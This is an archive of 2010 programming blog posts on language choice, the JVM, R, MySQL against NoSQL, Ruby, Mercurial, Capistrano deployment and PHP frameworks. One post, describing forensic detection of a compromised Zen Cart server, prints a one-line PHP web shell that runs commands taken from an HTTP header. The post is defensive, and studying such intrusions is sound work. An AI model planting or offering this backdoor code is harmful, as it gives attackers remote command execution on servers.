Archive for the ‘programming’ Category

Why choose Java?

Sunday, April 18th, 2010

Over on LinkedIn, Niki Atherton asked “Why choose Java?”. I replied:

I hate Java, but I love the JVM. I toyed around with Java in the early 00s, but I always found it too verbose for my needs. I preferred script languages that allowed me to develop software quickly. I ended up spending a lot of time writing PHP code. I was pleased to read about the death of Java when Bruce Eckel noted the shifting tides of 2005:

The Java hyper-enthusiasts have left the building, leaving a significant contingent of Java programmers behind, blinking in the bright lights without the constant drumbeat of boosterism. But the majority of programmers, who have been relatively quiet all this time, always knew that Java is a combination of strengths and weaknesses. These folks are not left with any feelings of surprise, but instead they welcome the silence, because it’s easier to think and work.

Then Eckel went on to become a major booster of Ruby.

What I did not realize at the time was that the mid-decade marked a turning point for the JVM. Since then there has been a fantastic proliferation of languages that take advantage of the eco-system: Scala, Groovy, BeanShell, Hecl, JavaFX, Jython, JRuby, etc.

I rediscovered the world of the JVM in 2008 and I am far more interested in the JVM eco-system than I have ever been before. I had, previously, admired the power and range of Java, but I’d rejected it as too formal, too verbose and too constraining to be of interest. It was a boring, corporate language, with a lot of constraints that made sense for large enterprises but made no sense in the fast-moving startups that I worked with. I wanted the productivity offered by the script languages.

I am now finding that the JVM, in 2010, offers the best of all worlds: dynamic languages that offer a high degree of productivity to programmers, mixed with the vast libraries that allow Java to do anything. And the Java eco-system includes fantastic IDEs like NetBeans and Eclipse. And, of course, it allows for working with a wider range of platforms than what Microsoft’s development tools allow.

When to use the R language

Saturday, April 17th, 2010


When you have to explore data. At the start of an analytic project, it’s a good idea to create a bunch of graphical visualizations of your data to get a sense of what’s inside it. In terms of its graphical capabilities, R exists in a whole separate dimension from Excel. This was perhaps the most shocking part to me about using R for the first time: I really thought I had a handle on data analysis even though I’d restricted my software to Excel, but boy was I wrong. The visualizations you can create in R are much more sophisticated and much more nuanced. And, philosophically, you can tell that the visualization tools in R were created by people more interested in good thinking about data than about beautiful presentation. (The result, ironically, is a much more beautiful presentation, IMHO.)

Here’s how I’d put the difference to someone who’s familiar with Excel but not yet with R. The graphics creation options that Excel gives you are all based in the graphical user interface. This is what makes Excel relatively easy to use—all your options are laid out before you with nice buttons and fill-in-the-blank boxes. But in order to create a graphical interface that’s easy to use, the creators of Excel had to make a bunch of decisions about what sorts of graphics you are and are not likely to want. With too many choices, the graphical interface becomes cumbersome and frustrating, so to achieve simplicity they had to eliminate options.

And this isn’t a gripe or anything. I can’t say I’d have done a better job designing Excel’s charting graphical interface. I cut my teeth on it.

These limitations become a problem when you want to inspect data visually in a bunch of different ways in order to explore it. R, through a combination of its well-designed base graphics package, the exceptionally well-designed lattice graphics package, and the jaw-droppingly well-designed ggplot2 graphics package, offers a breathtaking array of visualization options that you access through the command line or scripts. It has power that you just can’t get using a graphical interface to generate your charts.

StackOverflow is a hit, so why didn’t StackExchange also become a hit?

Saturday, April 17th, 2010


If you had to name a single language to know inside and out, what would it be?

Sunday, April 11th, 2010

Joe Castelli on LinkedIn asked “If you had to name a single language to know inside and out, what would it be?”

My response:

If you’d like to work with robotics, learn C. Possibly also Java/Arduino.

If you’d like to work for a big Hollywood studio, doing Maya 3D graphics, learn MEL.

If you’d like to do web development, then Ruby/Rails or PHP/Symfony or Groovy/Grails are all good bets.

If you’d like to work inside a big corporation and work on their internal dashboards, you’ll need to know either Java or C#.

If you’d like to work at an all-Mac publishing house, learn AppleScript.

If you’d like to do animation, then learn Flash/Flex/ActionScript.

If you’d like to develop for the Linux kernel, learn C.

If you want to design the logic boards that go inside consumer electronic stereo equipment, learn C++.

If you’d like to develop for the iPhone, then learn Objective-C.

If you think you will spend most of your career doing statistical work, then learn the R language.

You get my point? What you should learn depends on what you’d like to do.

Introducing Codewi.se: programming questions, and their award money, collected at one location

Wednesday, April 7th, 2010

Darren Hoyt and I launched WP Questions back in December. So far, $2,260 has been paid out to experts who answered people’s urgent WordPress questions. We have since launched a few other sites, focused on PHP and JavaScript, and now today we launch an umbrella site: Codewi.se. One glance at Codewi.se and you will see every question currently looking for an answer, on any of our sites. You will also see how much of an award is being offered for each of the questions.

The teachings of the great master programmer Qc Na

Monday, April 5th, 2010


The venerable master Qc Na was walking with his student, Anton. Hoping to prompt the master into a discussion, Anton said “Master, I have heard that objects are a very good thing – is this true?” Qc Na looked pityingly at his student and replied, “Foolish pupil – objects are merely a poor man’s closures.”

Chastised, Anton took his leave from his master and returned to his cell, intent on studying closures. He carefully read the entire “Lambda: The Ultimate…” series of papers and its cousins, and implemented a small Scheme interpreter with a closure-based object system. He learned much, and looked forward to informing his master of his progress.

On his next walk with Qc Na, Anton attempted to impress his master by saying “Master, I have diligently studied the matter, and now understand that objects are truly a poor man’s closures.” Qc Na responded by hitting Anton with his stick, saying “When will you learn? Closures are a poor man’s object.” At that moment, Anton became enlightened.
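The koan works because each construct can emulate the other. Here is a minimal Ruby sketch of both directions; the `make_counter` and `Adder` names are hypothetical, chosen only for illustration:

```ruby
# Direction 1: an "object" built only from closures.
# The local variable `count` is private state captured by the lambdas.
def make_counter
  count = 0
  {
    increment: -> { count += 1 },
    value:     -> { count }
  }
end

# Direction 2: a "closure" built only from an object.
# The instance variable plays the role of the captured variable,
# and #call plays the role of invoking the closure.
class Adder
  def initialize(n)
    @n = n
  end

  def call(x)
    x + @n
  end
end

counter = make_counter
counter[:increment].call
counter[:increment].call
puts counter[:value].call   # prints 2

add_five = Adder.new(5)
puts add_five.call(10)      # prints 15

# Both respond to #call, so a caller cannot tell them apart.
add_five_lambda = ->(x) { x + 5 }
p [add_five, add_five_lambda].map { |f| f.call(1) }  # prints [6, 6]
```

Each call to `make_counter` gets its own private `count`, exactly as each `Adder.new` gets its own `@n`: the same encapsulation, reached from opposite ends.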

Is MySQL a really terrible database system?

Thursday, March 25th, 2010

I was surprised by this headline:

DIGG: 4000% PERFORMANCE INCREASE BY SORTING IN PHP RATHER THAN MYSQL

I thought, “How can that be?” Sorting in a database should always be faster than sorting in PHP. Still, the article made a lot of good-sounding points:

1.) Precompute on writes, make reads fast. This is an oldie as a scaling strategy, but it’s valuable to see how SimpleGeo is applying it to their problem of finding entities within a certain geographical region. Using Cassandra they’ve built two clusters: one for indexes and one for records. The records cluster, as you might imagine, is a simple data lookup. The index cluster has a carefully constructed key for every lookup scenario. The indexes are computed on the write, so reads are very fast. As reads dominate, this makes a lot of sense. Queries based on time are also precomputed. Joe mentions some special algorithms for spreading out data, which tends to cluster around geographical regions, but does not mention what these are.
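The “precompute on writes” idea can be sketched in a few lines of Ruby. This is a hypothetical in-memory stand-in for the two Cassandra clusters the quote describes (one store for records, one for indexes). The grid-cell key, latitude and longitude truncated to whole degrees, is an assumption made purely for illustration, since the quote notes SimpleGeo’s actual scheme was not disclosed; updates and deletes are left out.

```ruby
# Hypothetical in-memory stand-ins for the two clusters in the quote:
# @records is a plain id -> record lookup, and @index maps a
# precomputed lookup key to the ids of every record filed under it.
class GeoStore
  def initialize
    @records = {}
    @index = Hash.new { |hash, key| hash[key] = [] }
  end

  # Assumed key scheme (not SimpleGeo's): truncate to whole degrees.
  def self.cell_key(lat, lon)
    "cell:#{lat.floor}:#{lon.floor}"
  end

  # All the work happens on the write: store the record, then update
  # every index key a later read might use.
  def write(id, lat, lon, data)
    @records[id] = { lat: lat, lon: lon, data: data }
    @index[self.class.cell_key(lat, lon)] << id
  end

  # A read is one index lookup plus direct record fetches; no scanning.
  def in_cell(lat, lon)
    @index.fetch(self.class.cell_key(lat, lon), []).map { |id| @records[id] }
  end
end

store = GeoStore.new
store.write(1, 51.5, 0.1, "cafe")
store.write(2, 51.9, 0.8, "bakery")
store.write(3, 48.8, 2.3, "museum")
p store.in_cell(51.2, 0.5).map { |r| r[:data] }  # prints ["cafe", "bakery"]
```

The trade-off is the one the quote names: every write pays for building the index entries so that the far more frequent reads never have to search.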

3.) The relational tool chain has failed for real-time. The relational database tool chain is not evolving. It has failed for large scale, real-time environments. Building scalable systems on a relational database requires building sharding, load balancing, resharding, cluster management, worrying about consistency, implementing distributed queries, and other layers yourself, so why bother? Cassandra does all that for you out of the box. Shot off a server and Cassandra will handle all the remapping and rerouting automatically.

4.) Scaling practices turn a relational database into a non-relational database. To scale at Digg they followed a set of practices very similar to those used at eBay. No joins, no foreign key constraints (to scale writes), primary key look-ups only, limited range queries, and joins were done in memory. When implementing the comment feature a 4,000 percent increase in performance was created by sorting in PHP instead of MySQL. All this effort required to make a relational database scale basically meant you were using a non-relational database anyway. So why not just use a non-relational database from the start?
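The practice in point 4 (primary-key lookups only, with joins and sorting done in application memory) looks roughly like the following. Digg did this in PHP; this sketch uses Ruby, and the comment and user rows and their field names are hypothetical.

```ruby
# Hypothetical rows, as they might come back from primary-key lookups
# (no JOIN and no ORDER BY pushed down to the database).
COMMENTS = [
  { id: 11, user_id: 2, diggs: 5,  body: "Nice" },
  { id: 12, user_id: 1, diggs: 42, body: "First!" },
  { id: 13, user_id: 2, diggs: 17, body: "Agreed" }
]
USERS = { 1 => { name: "alice" }, 2 => { name: "bob" } }

# Join in memory: attach each comment's author via a hash lookup.
# Sort in memory: most diggs first, ties broken by id.
def comment_thread(comments, users)
  comments
    .map { |c| c.merge(author: users.fetch(c[:user_id])[:name]) }
    .sort_by { |c| [-c[:diggs], c[:id]] }
end

comment_thread(COMMENTS, USERS).each do |c|
  puts "#{c[:diggs]} #{c[:author]}: #{c[:body]}"
end
```

This moves work from the database server to the web tier, which only pays off if the web tier has spare capacity. The 4,000 percent figure is Digg’s measurement; the sketch shows the shape of the technique, not that result.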

6.) Scaling equals specialization. To scale often requires building highly custom, problem specific solutions.

But then Dennis Forbes offered this counter-point:

Shocked by the incredibly poor database performance described on the Digg technology blog, baffled that they cast it as demonstrative of performance issues with RDBMS’ in general, I was motivated to create a simile of their database problem.

While they posted that entry six months ago, they recently followed up with more statements on the NoSQL / RDBMS divide, and are now being heavily used as a citation of sorts.

For instance Dare Obasanjo held Digg’s moves as a rebuttal of my prior entry on SQL scaling (though my entry actually explicitly excluded incredibly rare edge cases like Digg’s, and my core point was that the majority of database uses don’t have the needs of a site like Digg, I’m always one to take on a challenge), which then got picked up in other blogs.

I would say Digg’s case is an example of a bottom-feeder RDBMS product (apologies for being incendiary, but why does the problem always come down to MySQL? These examples always end up being “we moved from MySQL to NoSQL” rather than “We moved from Sybase ASE to NoSQL”), used arguably suboptimally on underpowered hardware, and it proves nothing of substance about either database technology. Yet it’s held as demonstrative of something, which is why I focus on it. They are different tools in the toolbox, arguably for different purposes, and that isn’t the focus of this entry.

He offers some interesting test results. He also suggests that more companies should take advantage of big servers and cheap RAM:

Database servers really like having a lot of RAM. Ideally you should have more RAM than you have data, allowing it to cache the entirety of your DB (or at least the working-set quantity of DB on that partition) making incredible read performance achievable.

Joining rows is not a hard activity for database servers. It can do it at unfathomable rates if the data can be fed to it at the appropriate pace and in the right form. Even heavily normalized databases can be high performance.

What normally makes joins a performance issue is data locality: if you have to load two rows from different places on the disk, that’s two seeks instead of just one (or three, four, five or more instead of one). When seeks are as costly as they are on a magnetic disk, you avoid them (either by striving for a database that fits in memory, which paradoxically often calls for heavy normalization, or by de-normalizing).

…If I had 48GB of RAM in the test machine (which is fairly pedestrian outside of gerbil-sized cloud instances. Note that you can now add 128GB of RAM to servers for around $4000 in some cases), outside of the initial caching period the select rates would be stratospheric regardless of storage medium, though SSDs would still come in a very, very strong lead when it came to write performance.

For the same $4000 you could chain five Intel X25-E drives for 320GB of intensely high performance – and persistent – storage. Just keep going up until you have more throughput, I/O and storage than you could dream of.

Some high-end enterprise solutions now tier storage and automatically place data as appropriate, choosing between magnetic, SSD, and memory caching systems. The pages of the table that are never touched end up on the magnetic storage while the hot area – say Diggs within the last 6 months – are moved to SSDs or to huge banks of memory caching.

Learning a language means learning the culture

Thursday, March 25th, 2010

This is a great overview of the whole eco-system surrounding Ruby. I like the point he makes that learning a language involves learning the whole culture around the language:

But of course the actual language is only the tip of the iceberg (and finally we come to the actual point of this blog post): where you really face a steep learning curve is, well, everywhere else. Learning a language is a great start, but to be productive in any meaningful sense you also have to learn the libraries, the testing frameworks, the packaging systems, the build tools, the inline documentation systems, the code-hosting services, the documentation-hosting services, and no doubt a bunch of other stuff that I’ve not got around to yet. Let’s look at those in turn, and see how they are panning out for Ruby.

His conclusions, having surveyed some of the diversity of practices within the Ruby community:

None of this is the fault of Ruby; all the same issues exist for other languages. I’m gradually coming to the conclusion that they are sort of irreducible: they come with the territory. For Real Work (as opposed to solving interesting puzzles with Prolog or APL), you need a language that has developed a rich culture over time. That’s what enables the language to make all the connections it needs to make in order to do the kinds of things we need to do these days. What it needs, in short, is an ecosystem. And ecosystems are complicated things. They are hard to learn.

Could the Ruby culture be simplified? Well, maybe by fiat. Maybe Matz could decree that all projects must be generated by jeweler, hosted on github, documented in YARD, and must have unit tests using Shoulda. It would, in a way, be nice to have those decisions made for me. But even if the community accepted these diktats, which they wouldn’t, it’s not really what we want. Languages that grow and develop and succeed are those with rich, competitive ecosystems; constrain it too much and it becomes sterile. I’m guessing that in three years, some of the issues I’ve had to make decisions about will be much easier: Darwin will take care of the weaker approaches, and the stronger will survive. That’s how we got to the point of Ruby being as good as it is, after all — and by “good” I don’t just mean “elegant” or “fun to use”, but “capable of doing large-scale stuff using many different libraries available from and documented on well-known community sites”.

A comparison of Java and Ruby

Wednesday, March 24th, 2010

Interesting comparison of Java and Ruby:

But now I’ve conveniently landed on an actual conclusion. And here it is. Remember in that Elements of Programming Style review, I drew special attention to the first rule in the first proper chapter — “Say what you mean, simply and directly”? The more that runs through my mind, the more convinced I am that this deceptively simple-sounding aphorism is the heart of good programming. Seven short words; a whole world of wisdom.

And how can I say what I mean simply and directly if I’m spending all my time allocating temporary arrays and typing public static void main? My code can’t be simple if the functions I’m calling have complex interfaces. My code can’t be direct if it has to faff around making places to put intermediate results. If I am going to abide by the Prime Directive, I need a language that does all the fiddly stuff for me.
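To make “say what you mean, simply and directly” concrete, here is a small hypothetical task (count how often each word appears and list the most frequent) written in Ruby with no hand-managed temporary arrays and no `public static void main`. It illustrates the quoted point and is not taken from the quoted article; `Enumerable#tally` assumes Ruby 2.7 or later.

```ruby
# Count word frequencies and return the n most common words.
# Each step states what is wanted; the language does the bookkeeping.
def top_words(text, n)
  text.downcase
      .scan(/[a-z']+/)
      .tally                                   # word => count (Ruby 2.7+)
      .sort_by { |word, count| [-count, word] } # most frequent first, then A-Z
      .first(n)
end

p top_words("the cat and the hat and the bat", 2)  # prints [["the", 3], ["and", 2]]
```

The equivalent Java of the same era would need a class, a `main` method, a `HashMap`, and an explicit loop to fill it before any sorting could begin.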

You do not need to know math to be a programmer, but it opens some doors

Wednesday, March 24th, 2010

I’ve been going through something similar. I’ve done programming for years and I’ve never needed math skills. But recently, I’ve been thinking of all kinds of data mining projects that I’d like to do, so I’ve been reteaching myself algebra, and next year I hope to learn statistics. So I resonate with this:

A little while ago I started thinking about math. You see, I’ve been writing software for quite a few years now and to be totally honest, I haven’t yet found a need for math in my work. There has been plenty of new stuff I’ve had to learn/master, languages, frameworks, tools, processes, communication skills and library upon library of stuff to do just about anything you can think of; math hasn’t been useful for any of it. Of course, this is not surprising: the vast majority of the work I’ve been doing has been CRUD in one form or another, and that’s the vast majority of the work most developers do in these interweb times of ours. You do consulting – you mostly build websites, you work for a large corporate – you mostly build websites, you freelance – you mostly build websites. I am well aware that I am generalising quite a bit, but do bear with me, I am going somewhere.

Eventually you get a little tired of it, as I did. Don’t get me wrong it can be fun and challenging work, providing opportunities to solve problems and interact with interesting people – I am happy to do it during work hours. But the thought of building yet more websites in my personal time has somewhat lost its luster – you begin to look for something more interesting/cool/fun, as – once again – I did. Some people gravitate to front-end technologies and graphical things – visual feedback is seductive – I was not one of them (I love a nice front-end as much as the next guy, but it doesn’t really excite me), which is why, when I was confronted with some search-related problems I decided to dig a little further. And this brings me back to the start of this story because as soon as I grabbed the first metaphorical shovel-full of search, I ran smack-bang into some math and realized exactly just how far my skills have deteriorated. Unlike riding a bike – you certainly do forget (although I haven’t ridden a bike in years so maybe you forget that too :)).

Broadening Horizons

Learning a little bit about search exposed me to all sorts of interesting software-y and computer science-y related things/problems (machine learning, natural language processing, algorithm analysis etc.) and now everywhere I turn I see math and so feel my lack of skills all the more keenly. I’ve come to the realization that you need a decent level of math skill if you want to do cool and interesting things with computers. Here are some more in addition to the ones I already mentioned – cryptography, games AI, compression, genetic algorithms, 3d graphics etc. You need math to understand the theory behind these fields which you can then apply if you want to write those libraries and tools that I was talking about – rather than just use them (be a producer rather than just a consumer – to borrow an OS metaphor :)). And even if you don’t want to write any libraries, it makes for a much more satisfying time building software, when you really understand what makes things tick, rather than just plugging them in and hoping they do whatever the hell they’re supposed to.

What does programming work entail?

Wednesday, March 24th, 2010

Interesting criticism of the type of work that is nowadays common for computer programmers. Good quote from Don Knuth:

“There’s the change that I’m really worried about: that the way a lot of programming goes today isn’t any fun because it’s just plugging in magic incantations — combine somebody else’s software and start it up. It doesn’t have much creativity. I’m worried that it’s becoming too boring because you don’t have a chance to do anything much new. Your kick comes out of seeing fun results coming out of the machine, but not the kind of kick that I always got by creating something new. The kick now is after you’ve done your boring work then all of a sudden you get a great image. But the work didn’t used to be boring.” (page 594)

“The problem is that coding isn’t fun if all you can do is call things out of a library, if you can’t write the library yourself. If the job of coding is just to be finding the right combination of parameters, that does fairly obvious things, then who’d want to go into that as a career?” (page 581)

If() statements in DNA

Saturday, March 20th, 2010

I find it interesting that they might be close to figuring out how if() statements are written in DNA:

“We developed a new approach which enabled us to identify cases where a protein’s ability to turn a gene on or off can be affected by interactions with another protein anchored to a nearby area of the genome,” Korbel explains. “With it, we can begin to understand where such interactions happen, without having to study every single regulatory protein out there.”

DNA, combined with the proteins that make up our chromosomes, resembles a von Neumann computer, in that the software and the working memory share the same medium. The genes make up the “software” that begins the process of creating us, but the rest of our DNA is given over to recording the working state of who we are:

A group of scientists led by Jan Korbel at EMBL and Michael Snyder initially at Yale and now in Stanford were the first to compare individually sequenced human genomes to look for what caused differences in gene regulation amongst ten different people. They focused on non-coding regions – stretches of DNA that lie between genes and, unlike genes, don’t hold the instructions for producing proteins. These DNA sequences, which may vary from person to person, can act as anchors to which regulatory proteins, known as transcription factors, attach themselves to switch genes on or off.

Korbel, Snyder, and colleagues found that up to a quarter of all human genes are regulated differently in different people, more than there are genetic variations in genes themselves. The scientists found that many of these differences in how regulatory proteins act are due to changes in the DNA sequences they bind to. In some cases, such changes can be a difference in a single letter of the genetic code, while in others a large section of DNA may be altered. But surprisingly, they discovered even more variations could not be so easily explained. They reasoned that some of these seemingly inexplicable differences might arise if regulatory proteins didn’t act alone, but interacted with each other.

Here is an oddly conservative statement:

Finally, Korbel, Snyder and colleagues compared the information on humans with that from a chimpanzee, and found that with respect to gene regulation there seems to be almost as much variation between humans as between us and our primate cousins – a small margin in which may lie important clues both to how we evolved and to what makes us humans different from one another.

In a study published online in Nature yesterday, researchers led by Snyder in the USA and Lars Steinmetz at EMBL in Heidelberg have found that similar differences in gene regulation also occur in an organism which is much farther from us in the evolutionary tree: baker’s yeast.

Do they simply not understand what they are looking at? Are they unaware that software has both code and state? As a point of comparison, if a friend of mine is playing a game of Halo, and Microsoft suddenly gives me the complete source code to Halo, would I know what was happening to my friend in the game? Of course not: how many times he’s been killed and how much ammo he has left would all be state, recorded in working memory, not in the source code. Or, another example, if I’m given the complete source code for Adobe Photoshop, I still know nothing about what images people, all across the world, might be editing at any given moment. Having source code doesn’t tell me state.
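The code-versus-state distinction fits in a few lines. In this toy Ruby sketch, the `Player` class and its fields are hypothetical stand-ins for the Halo example: two players run identical code, yet reading the class tells you nothing about either player’s current situation.

```ruby
# The "source code": identical for every player.
class Player
  attr_reader :deaths, :ammo

  def initialize
    @deaths = 0
    @ammo = 100
  end

  def fire(shots)
    @ammo -= [shots, @ammo].min   # cannot fire more rounds than remain
  end

  def die
    @deaths += 1
    @ammo = 100                   # respawn with a full load
  end
end

# Two running instances: same code, different state.
friend = Player.new
friend.fire(30)
friend.die
friend.fire(70)

me = Player.new
me.fire(5)

puts "friend: deaths=#{friend.deaths} ammo=#{friend.ammo}"  # deaths=1 ammo=30
puts "me:     deaths=#{me.deaths} ammo=#{me.ammo}"          # deaths=0 ammo=95
```

Only by inspecting the running objects, not the class definition, can you learn that the friend has died once and has 30 rounds left.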

Why is this obvious to me and yet seemingly confusing to the biologists?

Is Apostrophe the best CMS written in PHP?

Thursday, March 18th, 2010

Robert Speer has a great write up of Apostrophe:

Apostrophe is the easiest to use content management system (CMS) available to the open source community. An easy CMS means that content managers are more likely to use it, which means consumers will get better information and be more likely to follow the site’s profit funnel.

For web solutions providers Apostrophe is a CMS solution that bypasses the commodity hell of WordPress, Drupal, and Joomla by providing a unique value differentiation. Apostrophe also has the advantage of being built on an enterprise grade web framework used by sites like Delicious, Dailymotion, Yahoo! Answers, and Yahoo! Bookmarks. Symfony provides a consistent structure that encourages collaboration, and the large community of developers already familiar with Symfony means help is available.

Mercurial is better than Subversion?

Thursday, March 18th, 2010

Joel Spolsky convinces me that Mercurial is better than Subversion.

In that podcast, I said, “To me, the fact that they make branching and merging easier just means that your coworkers are more likely to branch and merge, and you’re more likely to be confused.”

Well, you know, that podcast is not prepared carefully in advance; it’s just a couple of people shooting the breeze. So what usually happens is that we say things that are, to use the technical term, wrong. Usually they are wrong either in details or in spirit, or in details and in spirit, but this time, I was just plain wrong. Like strawberry pizza. Or jalapeño bagels. WRONG.

Long before this podcast occurred, my team had switched to Mercurial, and the switch really confused me, so I hired someone to check in code for me (just kidding). I did struggle along for a while by memorizing a few key commands, imagining that they were working just like Subversion, but when something didn’t go the way it would have with Subversion, I got confused, and would pretty much just have to run down the hall to get Benjamin or Jacob to help.

I do not enjoy doing merges of any kind in Subversion. Normally, when I get some code stable enough for release, I then abandon that line. I’ll do emergency bug fixes, but no further work. Instead, I start a new Subversion project, and all future work happens in that new project. Clearly, this is not the way version control is supposed to work. So I’m intrigued that Mercurial might fix the problems with Subversion.

A JavaFX group at Mix Oracle

Sunday, March 14th, 2010

There is a new JavaFX group at Mix Oracle. Oddly, it has no RSS feed, so I have to post a link here, or I will not remember that it exists.

Deployment strategies with Capistrano

Saturday, March 13th, 2010

Two posts on deploying web software with Capistrano.

Craig T Mackenzie writes:

Like most people I use capistrano to deploy my rails applications, at work we host with the excellent railsmachine and they have really helped simplify the process of deploying to their servers using the railsmachine gem, which builds on top of the excellent functionality of capistrano.

The way these tools work by default, they only allow you to deploy one instance of your application, which is fine; that’s all they are intended to do. But in the client facing world you’re probably going to want to have at least two versions of the same application at different stages of development running on the same server.

A live forward facing version (my-app.com) and a staging version (staging.my-app.com) for client approval / production testing (not code testing, that should stay on your development box) / progressive reviews etc.

So how do we achieve that? The idea is to determine what context you are deploying your application in, and use the fact that capistrano tasks can be chained together to set everything up ready for deploying a revision of your application to a targeted url, independent of other deployments.

Jamis Buck writes:

I’m still really pushing back against adding staging support into Capistrano itself. You can accomplish what you want without using environment variables by using cap’s -S switch:

cap -S stage=production deploy

Then, your deploy.rb looks like:

# set the default, unless it was set on the CLI
set :stage, "development" unless variables[:stage]

# do the setup, based on the selected stage
case stage
when "production"
  set :deploy_to, "…"
  role :web, "…"
  role :app, "…"

when "development"
  # development settings go here

when "demo"
  # demo settings go here

else
  raise "unsupported staging environment: #{stage}"
end
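The same stage selection can also be written as a lookup table, which keeps each stage’s settings together and fails loudly on a mistyped stage name. This is plain Ruby with no Capistrano dependency, so it only sketches the selection logic; the `STAGES` table, `stage_settings` helper, hosts, and paths are all hypothetical.

```ruby
# Hypothetical per-stage settings; the hosts and paths are placeholders.
STAGES = {
  "production"  => { deploy_to: "/var/www/my-app",         web: "my-app.com" },
  "staging"     => { deploy_to: "/var/www/my-app-staging", web: "staging.my-app.com" },
  "development" => { deploy_to: "/tmp/my-app",             web: "localhost" }
}.freeze

# Fall back to development when no stage was given, like the
# `unless variables[:stage]` default in Jamis Buck's deploy.rb,
# and reject any stage name that is not in the table.
def stage_settings(stage = nil)
  stage ||= "development"
  STAGES.fetch(stage) { raise ArgumentError, "unsupported staging environment: #{stage}" }
end

p stage_settings("staging")[:web]  # prints "staging.my-app.com"
```

In an actual deploy.rb, the returned values would be handed to Capistrano’s own `set :deploy_to` and `role :web` calls rather than printed.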

How to discover a rootkit attack on your Linux server

Saturday, March 13th, 2010

A great bit of sysadmin detective work.

The second entry, with the POST, looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.
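A crude first pass at spotting this kind of backdoor is to search the web root for PHP files that pass request data straight into a command-execution function. The Ruby sketch below does that with a regular expression; the pattern is an assumption and far from exhaustive (obfuscated shells, `eval`, and encoded payloads will slip through), so a clean result is inconclusive, not proof that the server is safe.

```ruby
require "find"

# PHP command-execution functions fed directly from a request
# superglobal, e.g. system($_SERVER["HTTP_SHELL"]). Deliberately
# simple: obfuscated or encoded payloads will not match.
SUSPICIOUS = /\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\b/i

# Return [path, line_number, line] for every matching line in any
# .php file under root.
def scan_php(root)
  hits = []
  Find.find(root) do |path|
    next unless File.file?(path) && path.end_with?(".php")
    File.foreach(path).with_index(1) do |line, lineno|
      clean = line.scrub  # tolerate invalid byte sequences
      hits << [path, lineno, clean.strip] if clean.match?(SUSPICIOUS)
    end
  end
  hits
end
```

Usage, assuming the site lives under a hypothetical `/var/www`: `scan_php("/var/www").each { |path, n, line| puts "#{path}:#{n}: #{line}" }`. Against the file above, it would flag the single line in images/imagedisplay.php.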

Eli White on using lambda functions in PHP

Friday, March 12th, 2010

Eli White offers a very smart use of lambda functions in PHP.

Now not only would this work for my specific situation, but ANY controller could reuse this pagination subview and define exactly how it wanted its URLs to be formed. Now, the view could completely change around how the pagination section is displayed, show as many, or as few pages as it wants to, and all that without ever touching the controller.

This is one simple example, but I’ve become enamored of this approach. Using lambda functions in this way, you are able to have complicated logic represented inside of your view, but encapsulated/created by the controller. Also of note is the fact that the view is managing to use the $jsfunc and $baseurl values, but without actually having to be granted access to them. This allows for another level of encapsulation, as I exposed one function, instead of 2 separate variables. In the future if other data points start being needed to determine what a URL should be, the view never needs to know that, as the controller will continue to update the function on its behalf.
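Eli White’s example is PHP; the same idea translated to Ruby looks roughly like this. The controller builds a lambda that closes over the base URL (his `$baseurl`; the `$jsfunc` value is left out here), and a hypothetical pagination view only ever calls that lambda, so it never sees the variable itself. The helper names and the `?page=` URL format are assumptions for illustration.

```ruby
# Controller side: decide how page URLs are formed and hide the
# details inside a lambda. The view receives the lambda, not base_url.
def build_page_url(base_url)
  ->(page) { "#{base_url}?page=#{page}" }
end

# View side: render pagination links, knowing nothing about URL rules.
# Shows at most `window` pages on each side of the current page.
def render_pagination(current, total, url_for, window: 2)
  first = [current - window, 1].max
  last  = [current + window, total].min
  (first..last).map do |n|
    n == current ? "[#{n}]" : %(<a href="#{url_for.call(n)}">#{n}</a>)
  end.join(" ")
end

puts render_pagination(1, 3, build_page_url("/songs"))
```

Switching to a different URL scheme, say a JavaScript call instead of a query string, means changing only the lambda the controller passes in; `render_pagination` stays untouched.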

Why software frameworks are beneficial to clients

Friday, March 12th, 2010

On LinkedIn, I had a useful conversation with Kris Herlaar, which I will repeat here.

Personal, individual frameworks made a lot of sense in 2000 and 2001 and 2002, but now? Of my 3 most recent contracts, 2 were rebuilds of sites built by some other PHP programmer. In some cases the code was good, but the framework was their own, altogether personal, and undocumented.

I think we betray our clients if we use personal frameworks in 2010. You can build a great site using Cake, Symfony, CodeIgniter, or WordPress, Joomla, or Drupal. You can build a great site using modified versions of existing CMSs, or using an open source framework to build your software. These open source projects offer standardization, and standardization is important. These open source projects offer documentation, and documentation is important.

Kris wrote:

People with different backgrounds have different ideas about what is good, and there are probably frameworks for every possible set of ideas you and I could think of.

Yes, and this fact is expensive for my clients.

I do think what I’m writing about here is, in fact, a trend. When I look for new PHP gigs, I notice more and more of them require the use of some framework or CMS. The most common requests are Drupal, WordPress, Joomla, Symfony and CodeIgniter. My sense is that businesses are realizing that it is expensive to allow a programmer to invent their own framework, so the businesses are insisting on the use of some open source software which is well documented.

Here is the scenario that I have seen a lot during the last 5 years:

A company hires a PHP programmer. The company (called “abc”) says “Build us a website that does xyz.” The programmer invents their own software and builds xyz. Since the programmer thinks they are working alone, they allow themselves to cut corners. They copy and paste code. They do not refactor as much as they should. They do not document much, since they assume they are the only ones working with the code.

After 3 years, the programmer leaves to take a new job somewhere else. The “abc” company now hires a new PHP programmer. The company says “Please fix all the bugs in xyz”. The new programmer struggles to learn the code written by the last programmer. There is no documentation regarding how the software works. The last programmer, now gone, rarely responds to questions via email. The new programmer eventually figures out that the old code had some architecture, but the exceptions to the architecture continue to baffle. And why does the code repeat in some places? Is that a bit of copy and paste, or was that really necessary somehow?

After the bugs are fixed, the company says “Great, now, let’s extend xyz and add in features lmnop.” Extending the old code is difficult for the new programmer, since they have no idea how the last programmer intended for the code to be extended. Moreover, the last programmer didn’t even foresee some of the new needs of lmnop, so the old code is badly suited to the new job. The new programmer struggles with the task of adding features while keeping the code base backwards compatible. A job that should take 1 month instead takes 2 months.

